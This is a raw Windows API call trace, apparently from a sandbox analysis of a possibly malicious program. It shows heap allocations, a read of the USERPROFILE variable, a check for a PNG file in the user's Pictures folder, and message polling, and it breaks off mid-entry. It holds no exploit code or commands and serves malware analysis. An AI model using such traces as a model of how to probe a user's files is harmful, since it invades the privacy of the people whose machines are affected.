1 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0209.010] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.011] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0209.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0209.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0209.019] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.019] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0209.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.022] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/aJ_Kkru.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51185a30, ftCreationTime.dwHighDateTime=0x1d5cf88, ftLastAccessTime.dwLowDateTime=0x5ad20230, ftLastAccessTime.dwHighDateTime=0x1d5cc20, ftLastWriteTime.dwLowDateTime=0x5ad20230, ftLastWriteTime.dwHighDateTime=0x1d5cc20, nFileSizeHigh=0x0, nFileSizeLow=0xef91, dwReserved0=0x0, dwReserved1=0x0, cFileName="aJ_Kkru.png", cAlternateFileName="")) returned 0x9e2078 [0209.024] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.025] HeapFree 